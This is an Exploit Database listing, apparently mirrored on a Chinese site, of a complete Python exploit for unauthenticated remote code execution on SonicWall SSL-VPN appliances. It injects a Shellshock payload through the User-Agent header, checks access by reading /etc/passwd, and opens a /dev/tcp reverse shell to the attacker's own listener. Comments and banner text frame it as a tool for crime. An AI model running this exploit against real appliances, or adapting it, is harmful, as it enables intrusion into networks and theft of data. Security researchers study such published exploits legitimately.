SonicWall SSL-VPN 8.0.0.0 – ‘visualdoor’ Remote Code Execution (Unauthenticated)

• Exploit Database
• 39 阅读

• 作者： Darren Martyn
  日期： 2021-01-29
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/49499/

• # Exploit Title: SonicWall SSL-VPN 8.0.0.0 - 'shellshock/visualdoor' Remote Code Execution (Unauthenticated)
  # Exploit Author: Darren Martyn
  # Vendor Homepage: https://www.home-assistant.io/
  # Version: < SMA 8.0.0.4
  # Blog post: https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/
  
  #!/usr/bin/python
  # coding: utf-8
  # Author: Darren Martyn
  # Credit: Phineas Fisher
  # Notes:
  # This exploit basically implements the exploits Phineas Fisher used to pwn Hacking Team 
  # and the Cayman Trust Bank place. It uses the Shellshock vulnerability to gain a command
  # execution primitive as the "nobody" user in the cgi-bin/jarrewrite.sh web-script, spawns
  # a trivial reverse shell using /dev/tcp.
  # There is a fairly trivial LPE in these that gets you root by abusing setuid dos2unix, but
  # implementing that is left as an exercise for the reader. I've seen a few approaches, and 
  # would be interested in seeing yours.
  # There is another LPE that works only on some models which I also have removed from this.
  # Details: https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/
  import requests
  import sys
  import telnetlib
  import socket
  from threading import Thread
  from requests.packages.urllib3.exceptions import InsecureRequestWarning
  requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
  import time
  
  def banner():
  print """
   
   8888
   ""88
   88
  8b d888,adPPYba,88 88,adPPYYba,88
  `8b d8'88I8[""88 88"" `Y888
   `8b d8' 88 `"Y8ba, 88 88,adPPPPP8888
  `8b,d8'88aa]8I"8a, ,a8888,,8888
  "8"88`"YbbdP"' `"YbbdP'Y8`"8bbdP"Y888
   
   
   
   88
   88
   88
   ,adPPYb,88 ,adPPYba,,adPPYba, 8b,dPPYba,
  a8"`Y88a8" "8aa8" "8a88P' "Y8
  8b 888b d88b d888
  "8a, ,d88"8a, ,a8""8a, ,a8"88
   `"8bbdP"Y8 `"YbbdP"'`"YbbdP"' 88 
  SonicWall SSL-VPN Appliance Remote Exploit
  Public Release (Jan 2021). Author: Darren Martyn. Credit
  goes to Phineas Fisher for this. Stay inside, do crimes.
  """ 
  
  def handler(lp): # handler borrowed from Stephen Seeley.
  print "(+) starting handler on port %d" %(lp)
  t = telnetlib.Telnet()
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s.bind(("0.0.0.0", lp))
  s.listen(1)
  conn, addr = s.accept()
  print "(+) connection from %s" %(addr[0])
  t.sock = conn
  print "(+) pop thy shell!"
  t.interact()
  
  def execute_command(target, command):
  url = target + "/cgi-bin/jarrewrite.sh"
  headers = {"User-Agent": "() { :; }; echo ; /bin/bash -c '%s'" %(command)}
  r = requests.get(url=url, headers=headers, verify=False)
  return r.text
  
  def check_exploitable(target):
  print "(+) Testing %s for pwnability..." %(target)
  output = execute_command(target=target, command="cat /etc/passwd")
  if "root:" in output:
  print "(*) We can continue, time to wreck this shit."
  return True
  else:
  return False
  
  def pop_reverse_shell(target, cb_host, cb_port):
  print "(+) Sending callback to %s:%s" %(cb_host, cb_port)
  backconnect = "nohup bash -i >& /dev/tcp/%s/%s 0>&1 &" %(cb_host, cb_port)
  execute_command(target=target, command=backconnect)
  
  def hack_the_planet(target, cb_host, cb_port):
  if check_exploitable(target) == True:
  pass
  else:
  sys.exit("(-) Target not exploitable...")
  handlerthr = Thread(target=handler, args=(int(cb_port),))
  handlerthr.start()
  pop_reverse_shell(target=target, cb_host=cb_host, cb_port=cb_port)
  
  def main(args):
  banner()
  if len(args) != 4:
  sys.exit("use: %s https://some-vpn.lol:8090 hacke.rs 1337" %(args[0]))
  hack_the_planet(target=args[1], cb_host=args[2], cb_port=args[3])
  
  if __name__ == "__main__":
  main(args=sys.argv)